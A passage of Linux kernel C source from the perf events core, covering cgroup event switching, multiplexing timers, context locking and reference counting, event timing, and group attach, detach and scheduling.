local_irq_save(flags);
list = this_cpu_ptr(&cgrp_cpuctx_list);
list_for_each_entry(cpuctx, list, cgrp_cpuctx_entry) {
WARN_ON_ONCE(cpuctx->ctx.nr_cgroups == 0);
perf_ctx_lock(cpuctx, cpuctx->task_ctx);
perf_pmu_disable(cpuctx->ctx.pmu);
if (mode & PERF_CGROUP_SWOUT) {
cpu_ctx_sched_out(cpuctx, EVENT_ALL);
/*
* must not be done before ctxswout due
* to event_filter_match() in event_sched_out()
*/
cpuctx->cgrp = NULL;
}
if (mode & PERF_CGROUP_SWIN) {
WARN_ON_ONCE(cpuctx->cgrp);
/*
* set cgrp before ctxsw in to allow
* event_filter_match() to not have to pass
* task around
* we pass the cpuctx->ctx to perf_cgroup_from_task()
* because cgorup events are only per-cpu
*/
cpuctx->cgrp = perf_cgroup_from_task(task,
&cpuctx->ctx);
cpu_ctx_sched_in(cpuctx, EVENT_ALL, task);
}
perf_pmu_enable(cpuctx->ctx.pmu);
perf_ctx_unlock(cpuctx, cpuctx->task_ctx);
}
local_irq_restore(flags);
}
static inline void perf_cgroup_sched_out(struct task_struct *task,
struct task_struct *next)
{
struct perf_cgroup *cgrp1;
struct perf_cgroup *cgrp2 = NULL;
rcu_read_lock();
/*
* we come here when we know perf_cgroup_events > 0
* we do not need to pass the ctx here because we know
* we are holding the rcu lock
*/
cgrp1 = perf_cgroup_from_task(task, NULL);
cgrp2 = perf_cgroup_from_task(next, NULL);
/*
* only schedule out current cgroup events if we know
* that we are switching to a different cgroup. Otherwise,
* do no touch the cgroup events.
*/
if (cgrp1 != cgrp2)
perf_cgroup_switch(task, PERF_CGROUP_SWOUT);
rcu_read_unlock();
}
static inline void perf_cgroup_sched_in(struct task_struct *prev,
struct task_struct *task)
{
struct perf_cgroup *cgrp1;
struct perf_cgroup *cgrp2 = NULL;
rcu_read_lock();
/*
* we come here when we know perf_cgroup_events > 0
* we do not need to pass the ctx here because we know
* we are holding the rcu lock
*/
cgrp1 = perf_cgroup_from_task(task, NULL);
cgrp2 = perf_cgroup_from_task(prev, NULL);
/*
* only need to schedule in cgroup events if we are changing
* cgroup during ctxsw. Cgroup events were not scheduled
* out of ctxsw out if that was not the case.
*/
if (cgrp1 != cgrp2)
perf_cgroup_switch(task, PERF_CGROUP_SWIN);
rcu_read_unlock();
}
static inline int perf_cgroup_connect(int fd, struct perf_event *event,
struct perf_event_attr *attr,
struct perf_event *group_leader)
{
struct perf_cgroup *cgrp;
struct cgroup_subsys_state *css;
struct fd f = fdget(fd);
int ret = 0;
if (!f.file)
return -EBADF;
css = css_tryget_online_from_dir(f.file->f_path.dentry,
&perf_event_cgrp_subsys);
if (IS_ERR(css)) {
ret = PTR_ERR(css);
goto out;
}
cgrp = container_of(css, struct perf_cgroup, css);
event->cgrp = cgrp;
/*
* all events in a group must monitor
* the same cgroup because a task belongs
* to only one perf cgroup at a time
*/
if (group_leader && group_leader->cgrp != cgrp) {
perf_detach_cgroup(event);
ret = -EINVAL;
}
out:
fdput(f);
return ret;
}
static inline void
perf_cgroup_set_shadow_time(struct perf_event *event, u64 now)
{
struct perf_cgroup_info *t;
t = per_cpu_ptr(event->cgrp->info, event->cpu);
event->shadow_ctx_time = now - t->timestamp;
}
static inline void
perf_cgroup_defer_enabled(struct perf_event *event)
{
/*
* when the current task's perf cgroup does not match
* the event's, we need to remember to call the
* perf_mark_enable() function the first time a task with
* a matching perf cgroup is scheduled in.
*/
if (is_cgroup_event(event) && !perf_cgroup_match(event))
event->cgrp_defer_enabled = 1;
}
static inline void
perf_cgroup_mark_enabled(struct perf_event *event,
struct perf_event_context *ctx)
{
struct perf_event *sub;
u64 tstamp = perf_event_time(event);
if (!event->cgrp_defer_enabled)
return;
event->cgrp_defer_enabled = 0;
event->tstamp_enabled = tstamp - event->total_time_enabled;
list_for_each_entry(sub, &event->sibling_list, group_entry) {
if (sub->state >= PERF_EVENT_STATE_INACTIVE) {
sub->tstamp_enabled = tstamp - sub->total_time_enabled;
sub->cgrp_defer_enabled = 0;
}
}
}
/*
* Update cpuctx->cgrp so that it is set when first cgroup event is added and
* cleared when last cgroup event is removed.
*/
static inline void
list_update_cgroup_event(struct perf_event *event,
struct perf_event_context *ctx, bool add)
{
struct perf_cpu_context *cpuctx;
struct list_head *cpuctx_entry;
if (!is_cgroup_event(event))
return;
if (add && ctx->nr_cgroups++)
return;
else if (!add && --ctx->nr_cgroups)
return;
/*
* Because cgroup events are always per-cpu events,
* this will always be called from the right CPU.
*/
cpuctx = __get_cpu_context(ctx);
cpuctx_entry = &cpuctx->cgrp_cpuctx_entry;
/* cpuctx->cgrp is NULL unless a cgroup event is active in this CPU .*/
if (add) {
list_add(cpuctx_entry, this_cpu_ptr(&cgrp_cpuctx_list));
if (perf_cgroup_from_task(current, ctx) == event->cgrp)
cpuctx->cgrp = event->cgrp;
} else {
list_del(cpuctx_entry);
cpuctx->cgrp = NULL;
}
}
#else /* !CONFIG_CGROUP_PERF */
static inline bool
perf_cgroup_match(struct perf_event *event)
{
return true;
}
static inline void perf_detach_cgroup(struct perf_event *event)
{}
static inline int is_cgroup_event(struct perf_event *event)
{
return 0;
}
static inline u64 perf_cgroup_event_cgrp_time(struct perf_event *event)
{
return 0;
}
static inline void update_cgrp_time_from_event(struct perf_event *event)
{
}
static inline void update_cgrp_time_from_cpuctx(struct perf_cpu_context *cpuctx)
{
}
static inline void perf_cgroup_sched_out(struct task_struct *task,
struct task_struct *next)
{
}
static inline void perf_cgroup_sched_in(struct task_struct *prev,
struct task_struct *task)
{
}
static inline int perf_cgroup_connect(pid_t pid, struct perf_event *event,
struct perf_event_attr *attr,
struct perf_event *group_leader)
{
return -EINVAL;
}
static inline void
perf_cgroup_set_timestamp(struct task_struct *task,
struct perf_event_context *ctx)
{
}
void
perf_cgroup_switch(struct task_struct *task, struct task_struct *next)
{
}
static inline void
perf_cgroup_set_shadow_time(struct perf_event *event, u64 now)
{
}
static inline u64 perf_cgroup_event_time(struct perf_event *event)
{
return 0;
}
static inline void
perf_cgroup_defer_enabled(struct perf_event *event)
{
}
static inline void
perf_cgroup_mark_enabled(struct perf_event *event,
struct perf_event_context *ctx)
{
}
static inline void
list_update_cgroup_event(struct perf_event *event,
struct perf_event_context *ctx, bool add)
{
}
#endif
/*
* set default to be dependent on timer tick just
* like original code
*/
#define PERF_CPU_HRTIMER (1000 / HZ)
/*
* function must be called with interrupts disbled
*/
static enum hrtimer_restart perf_mux_hrtimer_handler(struct hrtimer *hr)
{
struct perf_cpu_context *cpuctx;
int rotations = 0;
WARN_ON(!irqs_disabled());
cpuctx = container_of(hr, struct perf_cpu_context, hrtimer);
rotations = perf_rotate_context(cpuctx);
raw_spin_lock(&cpuctx->hrtimer_lock);
if (rotations)
hrtimer_forward_now(hr, cpuctx->hrtimer_interval);
else
cpuctx->hrtimer_active = 0;
raw_spin_unlock(&cpuctx->hrtimer_lock);
return rotations ? HRTIMER_RESTART : HRTIMER_NORESTART;
}
static void __perf_mux_hrtimer_init(struct perf_cpu_context *cpuctx, int cpu)
{
struct hrtimer *timer = &cpuctx->hrtimer;
struct pmu *pmu = cpuctx->ctx.pmu;
u64 interval;
/* no multiplexing needed for SW PMU */
if (pmu->task_ctx_nr == perf_sw_context)
return;
/*
* check default is sane, if not set then force to
* default interval (1/tick)
*/
interval = pmu->hrtimer_interval_ms;
if (interval < 1)
interval = pmu->hrtimer_interval_ms = PERF_CPU_HRTIMER;
cpuctx->hrtimer_interval = ns_to_ktime(NSEC_PER_MSEC * interval);
raw_spin_lock_init(&cpuctx->hrtimer_lock);
hrtimer_init(timer, CLOCK_MONOTONIC, HRTIMER_MODE_ABS_PINNED);
timer->function = perf_mux_hrtimer_handler;
}
static int perf_mux_hrtimer_restart(struct perf_cpu_context *cpuctx)
{
struct hrtimer *timer = &cpuctx->hrtimer;
struct pmu *pmu = cpuctx->ctx.pmu;
unsigned long flags;
/* not for SW PMU */
if (pmu->task_ctx_nr == perf_sw_context)
return 0;
raw_spin_lock_irqsave(&cpuctx->hrtimer_lock, flags);
if (!cpuctx->hrtimer_active) {
cpuctx->hrtimer_active = 1;
hrtimer_forward_now(timer, cpuctx->hrtimer_interval);
hrtimer_start_expires(timer, HRTIMER_MODE_ABS_PINNED);
}
raw_spin_unlock_irqrestore(&cpuctx->hrtimer_lock, flags);
return 0;
}
void perf_pmu_disable(struct pmu *pmu)
{
int *count = this_cpu_ptr(pmu->pmu_disable_count);
if (!(*count)++)
pmu->pmu_disable(pmu);
}
void perf_pmu_enable(struct pmu *pmu)
{
int *count = this_cpu_ptr(pmu->pmu_disable_count);
if (!--(*count))
pmu->pmu_enable(pmu);
}
static DEFINE_PER_CPU(struct list_head, active_ctx_list);
/*
* perf_event_ctx_activate(), perf_event_ctx_deactivate(), and
* perf_event_task_tick() are fully serialized because they're strictly cpu
* affine and perf_event_ctx{activate,deactivate} are called with IRQs
* disabled, while perf_event_task_tick is called from IRQ context.
*/
static void perf_event_ctx_activate(struct perf_event_context *ctx)
{
struct list_head *head = this_cpu_ptr(&active_ctx_list);
WARN_ON(!irqs_disabled());
WARN_ON(!list_empty(&ctx->active_ctx_list));
list_add(&ctx->active_ctx_list, head);
}
static void perf_event_ctx_deactivate(struct perf_event_context *ctx)
{
WARN_ON(!irqs_disabled());
WARN_ON(list_empty(&ctx->active_ctx_list));
list_del_init(&ctx->active_ctx_list);
}
static void get_ctx(struct perf_event_context *ctx)
{
WARN_ON(!atomic_inc_not_zero(&ctx->refcount));
}
static void free_ctx(struct rcu_head *head)
{
struct perf_event_context *ctx;
ctx = container_of(head, struct perf_event_context, rcu_head);
kfree(ctx->task_ctx_data);
kfree(ctx);
}
static void put_ctx(struct perf_event_context *ctx)
{
if (atomic_dec_and_test(&ctx->refcount)) {
if (ctx->parent_ctx)
put_ctx(ctx->parent_ctx);
if (ctx->task && ctx->task != TASK_TOMBSTONE)
put_task_struct(ctx->task);
call_rcu(&ctx->rcu_head, free_ctx);
}
}
/*
* Because of perf_event::ctx migration in sys_perf_event_open::move_group and
* perf_pmu_migrate_context() we need some magic.
*
* Those places that change perf_event::ctx will hold both
* perf_event_ctx::mutex of the 'old' and 'new' ctx value.
*
* Lock ordering is by mutex address. There are two other sites where
* perf_event_context::mutex nests and those are:
*
* - perf_event_exit_task_context() [ child , 0 ]
* perf_event_exit_event()
* put_event() [ parent, 1 ]
*
* - perf_event_init_context() [ parent, 0 ]
* inherit_task_group()
* inherit_group()
* inherit_event()
* perf_event_alloc()
* perf_init_event()
* perf_try_init_event() [ child , 1 ]
*
* While it appears there is an obvious deadlock here -- the parent and child
* nesting levels are inverted between the two. This is in fact safe because
* life-time rules separate them. That is an exiting task cannot fork, and a
* spawning task cannot (yet) exit.
*
* But remember that that these are parent<->child context relations, and
* migration does not affect children, therefore these two orderings should not
* interact.
*
* The change in perf_event::ctx does not affect children (as claimed above)
* because the sys_perf_event_open() case will install a new event and break
* the ctx parent<->child relation, and perf_pmu_migrate_context() is only
* concerned with cpuctx and that doesn't have children.
*
* The places that change perf_event::ctx will issue:
*
* perf_remove_from_context();
* synchronize_rcu();
* perf_install_in_context();
*
* to affect the change. The remove_from_context() + synchronize_rcu() should
* quiesce the event, after which we can install it in the new location. This
* means that only external vectors (perf_fops, prctl) can perturb the event
* while in transit. Therefore all such accessors should also acquire
* perf_event_context::mutex to serialize against this.
*
* However; because event->ctx can change while we're waiting to acquire
* ctx->mutex we must be careful and use the below perf_event_ctx_lock()
* function.
*
* Lock order:
* cred_guard_mutex
* task_struct::perf_event_mutex
* perf_event_context::mutex
* perf_event::child_mutex;
* perf_event_context::lock
* perf_event::mmap_mutex
* mmap_sem
*/
static struct perf_event_context *
perf_event_ctx_lock_nested(struct perf_event *event, int nesting)
{
struct perf_event_context *ctx;
again:
rcu_read_lock();
ctx = ACCESS_ONCE(event->ctx);
if (!atomic_inc_not_zero(&ctx->refcount)) {
rcu_read_unlock();
goto again;
}
rcu_read_unlock();
mutex_lock_nested(&ctx->mutex, nesting);
if (event->ctx != ctx) {
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
goto again;
}
return ctx;
}
static inline struct perf_event_context *
perf_event_ctx_lock(struct perf_event *event)
{
return perf_event_ctx_lock_nested(event, 0);
}
static void perf_event_ctx_unlock(struct perf_event *event,
struct perf_event_context *ctx)
{
mutex_unlock(&ctx->mutex);
put_ctx(ctx);
}
/*
* This must be done under the ctx->lock, such as to serialize against
* context_equiv(), therefore we cannot call put_ctx() since that might end up
* calling scheduler related locks and ctx->lock nests inside those.
*/
static __must_check struct perf_event_context *
unclone_ctx(struct perf_event_context *ctx)
{
struct perf_event_context *parent_ctx = ctx->parent_ctx;
lockdep_assert_held(&ctx->lock);
if (parent_ctx)
ctx->parent_ctx = NULL;
ctx->generation++;
return parent_ctx;
}
static u32 perf_event_pid(struct perf_event *event, struct task_struct *p)
{
/*
* only top level events have the pid namespace they were created in
*/
if (event->parent)
event = event->parent;
return task_tgid_nr_ns(p, event->ns);
}
static u32 perf_event_tid(struct perf_event *event, struct task_struct *p)
{
/*
* only top level events have the pid namespace they were created in
*/
if (event->parent)
event = event->parent;
return task_pid_nr_ns(p, event->ns);
}
/*
* If we inherit events we want to return the parent event id
* to userspace.
*/
static u64 primary_event_id(struct perf_event *event)
{
u64 id = event->id;
if (event->parent)
id = event->parent->id;
return id;
}
/*
* Get the perf_event_context for a task and lock it.
*
* This has to cope with with the fact that until it is locked,
* the context could get moved to another task.
*/
static struct perf_event_context *
perf_lock_task_context(struct task_struct *task, int ctxn, unsigned long *flags)
{
struct perf_event_context *ctx;
retry:
/*
* One of the few rules of preemptible RCU is that one cannot do
* rcu_read_unlock() while holding a scheduler (or nested) lock when
* part of the read side critical section was irqs-enabled -- see
* rcu_read_unlock_special().
*
* Since ctx->lock nests under rq->lock we must ensure the entire read
* side critical section has interrupts disabled.
*/
local_irq_save(*flags);
rcu_read_lock();
ctx = rcu_dereference(task->perf_event_ctxp[ctxn]);
if (ctx) {
/*
* If this context is a clone of another, it might
* get swapped for another underneath us by
* perf_event_task_sched_out, though the
* rcu_read_lock() protects us from any context
* getting freed. Lock the context and check if it
* got swapped before we could get the lock, and retry
* if so. If we locked the right context, then it
* can't get swapped on us any more.
*/
raw_spin_lock(&ctx->lock);
if (ctx != rcu_dereference(task->perf_event_ctxp[ctxn])) {
raw_spin_unlock(&ctx->lock);
rcu_read_unlock();
local_irq_restore(*flags);
goto retry;
}
if (ctx->task == TASK_TOMBSTONE ||
!atomic_inc_not_zero(&ctx->refcount)) {
raw_spin_unlock(&ctx->lock);
ctx = NULL;
} else {
WARN_ON_ONCE(ctx->task != task);
}
}
rcu_read_unlock();
if (!ctx)
local_irq_restore(*flags);
return ctx;
}
/*
* Get the context for a task and increment its pin_count so it
* can't get swapped to another task. This also increments its
* reference count so that the context can't get freed.
*/
static struct perf_event_context *
perf_pin_task_context(struct task_struct *task, int ctxn)
{
struct perf_event_context *ctx;
unsigned long flags;
ctx = perf_lock_task_context(task, ctxn, &flags);
if (ctx) {
++ctx->pin_count;
raw_spin_unlock_irqrestore(&ctx->lock, flags);
}
return ctx;
}
static void perf_unpin_context(struct perf_event_context *ctx)
{
unsigned long flags;
raw_spin_lock_irqsave(&ctx->lock, flags);
--ctx->pin_count;
raw_spin_unlock_irqrestore(&ctx->lock, flags);
}
/*
* Update the record of the current time in a context.
*/
static void update_context_time(struct perf_event_context *ctx)
{
u64 now = perf_clock();
ctx->time += now - ctx->timestamp;
ctx->timestamp = now;
}
static u64 perf_event_time(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
if (is_cgroup_event(event))
return perf_cgroup_event_time(event);
return ctx ? ctx->time : 0;
}
/*
* Update the total_time_enabled and total_time_running fields for a event.
*/
static void update_event_times(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
u64 run_end;
lockdep_assert_held(&ctx->lock);
if (event->state < PERF_EVENT_STATE_INACTIVE ||
event->group_leader->state < PERF_EVENT_STATE_INACTIVE)
return;
/*
* in cgroup mode, time_enabled represents
* the time the event was enabled AND active
* tasks were in the monitored cgroup. This is
* independent of the activity of the context as
* there may be a mix of cgroup and non-cgroup events.
*
* That is why we treat cgroup events differently
* here.
*/
if (is_cgroup_event(event))
run_end = perf_cgroup_event_time(event);
else if (ctx->is_active)
run_end = ctx->time;
else
run_end = event->tstamp_stopped;
event->total_time_enabled = run_end - event->tstamp_enabled;
if (event->state == PERF_EVENT_STATE_INACTIVE)
run_end = event->tstamp_stopped;
else
run_end = perf_event_time(event);
event->total_time_running = run_end - event->tstamp_running;
}
/*
* Update total_time_enabled and total_time_running for all events in a group.
*/
static void update_group_times(struct perf_event *leader)
{
struct perf_event *event;
update_event_times(leader);
list_for_each_entry(event, &leader->sibling_list, group_entry)
update_event_times(event);
}
static enum event_type_t get_event_type(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
enum event_type_t event_type;
lockdep_assert_held(&ctx->lock);
event_type = event->attr.pinned ? EVENT_PINNED : EVENT_FLEXIBLE;
if (!ctx->task)
event_type |= EVENT_CPU;
return event_type;
}
static struct list_head *
ctx_group_list(struct perf_event *event, struct perf_event_context *ctx)
{
if (event->attr.pinned)
return &ctx->pinned_groups;
else
return &ctx->flexible_groups;
}
/*
* Add a event from the lists for its context.
* Must be called with ctx->mutex and ctx->lock held.
*/
static void
list_add_event(struct perf_event *event, struct perf_event_context *ctx)
{
lockdep_assert_held(&ctx->lock);
WARN_ON_ONCE(event->attach_state & PERF_ATTACH_CONTEXT);
event->attach_state |= PERF_ATTACH_CONTEXT;
/*
* If we're a stand alone event or group leader, we go to the context
* list, group events are kept attached to the group so that
* perf_group_detach can, at all times, locate all siblings.
*/
if (event->group_leader == event) {
struct list_head *list;
event->group_caps = event->event_caps;
list = ctx_group_list(event, ctx);
list_add_tail(&event->group_entry, list);
}
list_update_cgroup_event(event, ctx, true);
list_add_rcu(&event->event_entry, &ctx->event_list);
ctx->nr_events++;
if (event->attr.inherit_stat)
ctx->nr_stat++;
ctx->generation++;
}
/*
* Initialize event state based on the perf_event_attr::disabled.
*/
static inline void perf_event__state_init(struct perf_event *event)
{
event->state = event->attr.disabled ? PERF_EVENT_STATE_OFF :
PERF_EVENT_STATE_INACTIVE;
}
static void __perf_event_read_size(struct perf_event *event, int nr_siblings)
{
int entry = sizeof(u64); /* value */
int size = 0;
int nr = 1;
if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
size += sizeof(u64);
if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
size += sizeof(u64);
if (event->attr.read_format & PERF_FORMAT_ID)
entry += sizeof(u64);
if (event->attr.read_format & PERF_FORMAT_GROUP) {
nr += nr_siblings;
size += sizeof(u64);
}
size += entry * nr;
event->read_size = size;
}
static void __perf_event_header_size(struct perf_event *event, u64 sample_type)
{
struct perf_sample_data *data;
u16 size = 0;
if (sample_type & PERF_SAMPLE_IP)
size += sizeof(data->ip);
if (sample_type & PERF_SAMPLE_ADDR)
size += sizeof(data->addr);
if (sample_type & PERF_SAMPLE_PERIOD)
size += sizeof(data->period);
if (sample_type & PERF_SAMPLE_WEIGHT)
size += sizeof(data->weight);
if (sample_type & PERF_SAMPLE_READ)
size += event->read_size;
if (sample_type & PERF_SAMPLE_DATA_SRC)
size += sizeof(data->data_src.val);
if (sample_type & PERF_SAMPLE_TRANSACTION)
size += sizeof(data->txn);
event->header_size = size;
}
/*
* Called at perf_event creation and when events are attached/detached from a
* group.
*/
static void perf_event__header_size(struct perf_event *event)
{
__perf_event_read_size(event,
event->group_leader->nr_siblings);
__perf_event_header_size(event, event->attr.sample_type);
}
static void perf_event__id_header_size(struct perf_event *event)
{
struct perf_sample_data *data;
u64 sample_type = event->attr.sample_type;
u16 size = 0;
if (sample_type & PERF_SAMPLE_TID)
size += sizeof(data->tid_entry);
if (sample_type & PERF_SAMPLE_TIME)
size += sizeof(data->time);
if (sample_type & PERF_SAMPLE_IDENTIFIER)
size += sizeof(data->id);
if (sample_type & PERF_SAMPLE_ID)
size += sizeof(data->id);
if (sample_type & PERF_SAMPLE_STREAM_ID)
size += sizeof(data->stream_id);
if (sample_type & PERF_SAMPLE_CPU)
size += sizeof(data->cpu_entry);
event->id_header_size = size;
}
static bool perf_event_validate_size(struct perf_event *event)
{
/*
* The values computed here will be over-written when we actually
* attach the event.
*/
__perf_event_read_size(event, event->group_leader->nr_siblings + 1);
__perf_event_header_size(event, event->attr.sample_type & ~PERF_SAMPLE_READ);
perf_event__id_header_size(event);
/*
* Sum the lot; should not exceed the 64k limit we have on records.
* Conservative limit to allow for callchains and other variable fields.
*/
if (event->read_size + event->header_size +
event->id_header_size + sizeof(struct perf_event_header) >= 16*1024)
return false;
return true;
}
static void perf_group_attach(struct perf_event *event)
{
struct perf_event *group_leader = event->group_leader, *pos;
lockdep_assert_held(&event->ctx->lock);
/*
* We can have double attach due to group movement in perf_event_open.
*/
if (event->attach_state & PERF_ATTACH_GROUP)
return;
event->attach_state |= PERF_ATTACH_GROUP;
if (group_leader == event)
return;
WARN_ON_ONCE(group_leader->ctx != event->ctx);
group_leader->group_caps &= event->event_caps;
list_add_tail(&event->group_entry, &group_leader->sibling_list);
group_leader->nr_siblings++;
perf_event__header_size(group_leader);
list_for_each_entry(pos, &group_leader->sibling_list, group_entry)
perf_event__header_size(pos);
}
/*
* Remove a event from the lists for its context.
* Must be called with ctx->mutex and ctx->lock held.
*/
static void
list_del_event(struct perf_event *event, struct perf_event_context *ctx)
{
WARN_ON_ONCE(event->ctx != ctx);
lockdep_assert_held(&ctx->lock);
/*
* We can have double detach due to exit/hot-unplug + close.
*/
if (!(event->attach_state & PERF_ATTACH_CONTEXT))
return;
event->attach_state &= ~PERF_ATTACH_CONTEXT;
list_update_cgroup_event(event, ctx, false);
ctx->nr_events--;
if (event->attr.inherit_stat)
ctx->nr_stat--;
list_del_rcu(&event->event_entry);
if (event->group_leader == event)
list_del_init(&event->group_entry);
update_group_times(event);
/*
* If event was in error state, then keep it
* that way, otherwise bogus counts will be
* returned on read(). The only way to get out
* of error state is by explicit re-enabling
* of the event
*/
if (event->state > PERF_EVENT_STATE_OFF)
event->state = PERF_EVENT_STATE_OFF;
ctx->generation++;
}
static void perf_group_detach(struct perf_event *event)
{
struct perf_event *sibling, *tmp;
struct list_head *list = NULL;
lockdep_assert_held(&event->ctx->lock);
/*
* We can have double detach due to exit/hot-unplug + close.
*/
if (!(event->attach_state & PERF_ATTACH_GROUP))
return;
event->attach_state &= ~PERF_ATTACH_GROUP;
/*
* If this is a sibling, remove it from its group.
*/
if (event->group_leader != event) {
list_del_init(&event->group_entry);
event->group_leader->nr_siblings--;
goto out;
}
if (!list_empty(&event->group_entry))
list = &event->group_entry;
/*
* If this was a group event with sibling events then
* upgrade the siblings to singleton events by adding them
* to whatever list we are on.
*/
list_for_each_entry_safe(sibling, tmp, &event->sibling_list, group_entry) {
if (list)
list_move_tail(&sibling->group_entry, list);
sibling->group_leader = sibling;
/* Inherit group flags from the previous leader */
sibling->group_caps = event->group_caps;
WARN_ON_ONCE(sibling->ctx != event->ctx);
}
out:
perf_event__header_size(event->group_leader);
list_for_each_entry(tmp, &event->group_leader->sibling_list, group_entry)
perf_event__header_size(tmp);
}
static bool is_orphaned_event(struct perf_event *event)
{
return event->state == PERF_EVENT_STATE_DEAD;
}
static inline int __pmu_filter_match(struct perf_event *event)
{
struct pmu *pmu = event->pmu;
return pmu->filter_match ? pmu->filter_match(event) : 1;
}
/*
* Check whether we should attempt to schedule an event group based on
* PMU-specific filtering. An event group can consist of HW and SW events,
* potentially with a SW leader, so we must check all the filters, to
* determine whether a group is schedulable:
*/
static inline int pmu_filter_match(struct perf_event *event)
{
struct perf_event *child;
if (!__pmu_filter_match(event))
return 0;
list_for_each_entry(child, &event->sibling_list, group_entry) {
if (!__pmu_filter_match(child))
return 0;
}
return 1;
}
static inline int
event_filter_match(struct perf_event *event)
{
return (event->cpu == -1 || event->cpu == smp_processor_id()) &&
perf_cgroup_match(event) && pmu_filter_match(event);
}
static void
event_sched_out(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
u64 tstamp = perf_event_time(event);
u64 delta;
WARN_ON_ONCE(event->ctx != ctx);
lockdep_assert_held(&ctx->lock);
/*
* An event which could not be activated because of
* filter mismatch still needs to have its timings
* maintained, otherwise bogus information is return
* via read() for time_enabled, time_running:
*/
if (event->state == PERF_EVENT_STATE_INACTIVE &&
!event_filter_match(event)) {
delta = tstamp - event->tstamp_stopped;
event->tstamp_running += delta;
event->tstamp_stopped = tstamp;
}
if (event->state != PERF_EVENT_STATE_ACTIVE)
return;
perf_pmu_disable(event->pmu);
event->tstamp_stopped = tstamp;
event->pmu->del(event, 0);
event->oncpu = -1;
event->state = PERF_EVENT_STATE_INACTIVE;
if (event->pending_disable) {
event->pending_disable = 0;
event->state = PERF_EVENT_STATE_OFF;
}
if (!is_software_event(event))
cpuctx->active_oncpu--;
if (!--ctx->nr_active)
perf_event_ctx_deactivate(ctx);
if (event->attr.freq && event->attr.sample_freq)
ctx->nr_freq--;
if (event->attr.exclusive || !cpuctx->active_oncpu)
cpuctx->exclusive = 0;
perf_pmu_enable(event->pmu);
}
static void
group_sched_out(struct perf_event *group_event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx)
{
struct perf_event *event;
int state = group_event->state;
perf_pmu_disable(ctx->pmu);
event_sched_out(group_event, cpuctx, ctx);
/*
* Schedule out siblings (if any):
*/
list_for_each_entry(event, &group_event->sibling_list, group_entry)
event_sched_out(event, cpuctx, ctx);
perf_pmu_enable(ctx->pmu);
if (state == PERF_EVENT_STATE_ACTIVE && group_event->attr.exclusive)
cpuctx->exclusive = 0;
}
#define DETACH_GROUP 0x01UL
/*
* Cross CPU call to remove a performance event
*
* We disable the event on the hardware level first. After that we
* remove it from the context list.
*/
static void
__perf_remove_from_context(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
unsigned long flags = (unsigned long)info;
event_sched_out(event, cpuctx, ctx);
if (flags & DETACH_GROUP)
perf_group_detach(event);
list_del_event(event, ctx);
if (!ctx->nr_events && ctx->is_active) {
ctx->is_active = 0;
if (ctx->task) {
WARN_ON_ONCE(cpuctx->task_ctx != ctx);
cpuctx->task_ctx = NULL;
}
}
}
/*
* Remove the event from a task's (or a CPU's) list of events.
*
* If event->ctx is a cloned context, callers must make sure that
* every task struct that event->ctx->task could possibly point to
* remains valid. This is OK when called from perf_release since
* that only calls us on the top-level context, which can't be a clone.
* When called from perf_event_exit_task, it's OK because the
* context has been detached from its task.
*/
static void perf_remove_from_context(struct perf_event *event, unsigned long flags)
{
struct perf_event_context *ctx = event->ctx;
lockdep_assert_held(&ctx->mutex);
event_function_call(event, __perf_remove_from_context, (void *)flags);
/*
* The above event_function_call() can NO-OP when it hits
* TASK_TOMBSTONE. In that case we must already have been detached
* from the context (by perf_event_exit_event()) but the grouping
* might still be in-tact.
*/
WARN_ON_ONCE(event->attach_state & PERF_ATTACH_CONTEXT);
if ((flags & DETACH_GROUP) &&
(event->attach_state & PERF_ATTACH_GROUP)) {
/*
* Since in that case we cannot possibly be scheduled, simply
* detach now.
*/
raw_spin_lock_irq(&ctx->lock);
perf_group_detach(event);
raw_spin_unlock_irq(&ctx->lock);
}
}
/*
* Cross CPU call to disable a performance event
*/
static void __perf_event_disable(struct perf_event *event,
struct perf_cpu_context *cpuctx,
struct perf_event_context *ctx,
void *info)
{
if (event->state < PERF_EVENT_STATE_INACTIVE)
return;
update_context_time(ctx);
update_cgrp_time_from_event(event);
update_group_times(event);
if (event == event->group_leader)
group_sched_out(event, cpuctx, ctx);
else
event_sched_out(event, cpuctx, ctx);
event->state = PERF_EVENT_STATE_OFF;
}
/*
* Disable a event.
*
* If event->ctx is a cloned context, callers must make sure that
* every task struct that event->ctx->task could possibly point to
* remains valid. This condition is satisifed when called through
* perf_event_for_each_child or perf_event_for_each because they
* hold the top-level event's child_mutex, so any descendant that
* goes to exit will block in perf_event_exit_event().
*
* When called from perf_pending_event it's OK because event->ctx
* is the current context on this CPU and preemption is disabled,
* hence we can't get into perf_event_task_sched_out for this context.
*/
static void _perf_event_disable(struct perf_event *event)
{
struct perf_event_context *ctx = event->ctx;
raw_spin_lock_irq(&ctx->lock);
if (event->state <= PERF_EVENT_STATE_OFF) {
raw_spin_unlock_irq(&ctx->lock);
return;
}
raw_spin_unlock_irq(&ctx->lock);
event_function_call(event, __perf_event_disable, NULL);
}
void perf_event_disable_local(struct perf_event *event)
{
event_function_local(event, __perf_event_disable, NULL);
}
/*
* Strictly speaking kernel users cannot create groups and therefore this
* interface does not need the perf_event_ctx_lock() magic.
*/
void perf_event_disable(struct perf_event *event)
{
struct perf_event_context *ctx;
ctx = perf_event_ctx_lock(event);
_perf_event_disable(event);
perf_event_ctx_unlock(event, ctx);
}
EXPORT_SYMBOL_GPL(perf_event_disable);
void perf_event_disable_inatomic(struct perf_event *event)
{
event->pending_disable = 1;
irq_work_queue(&event->pending);
}
static void perf_set_shadow_time(struct perf_event *event,
struct perf_event_context *ctx,
u64 tstamp)
{
/*
* use the correct time source for the time snapshot
*
* We could get by without this by leveraging the
* fact that to get to this function, the caller
* has most likely already called update_context_time()
* and update_cgrp_time_xx() and thus both timestamp
* are identical (or very close). Given that tstamp is,
* already adjusted for cgroup, we could say that:
* tstamp - ctx->timestamp
* is equivalent to
* tstamp - cgrp->timestamp.
*
* Then, in perf_output_read(), the calculation would
* work with no changes because:
* - event is guaranteed scheduled in
* - no scheduled out in between
* - thus the timestamp would be the same
*
* But this is a bit hairy.
*
* So instead, we have an explicit cgroup call to remain
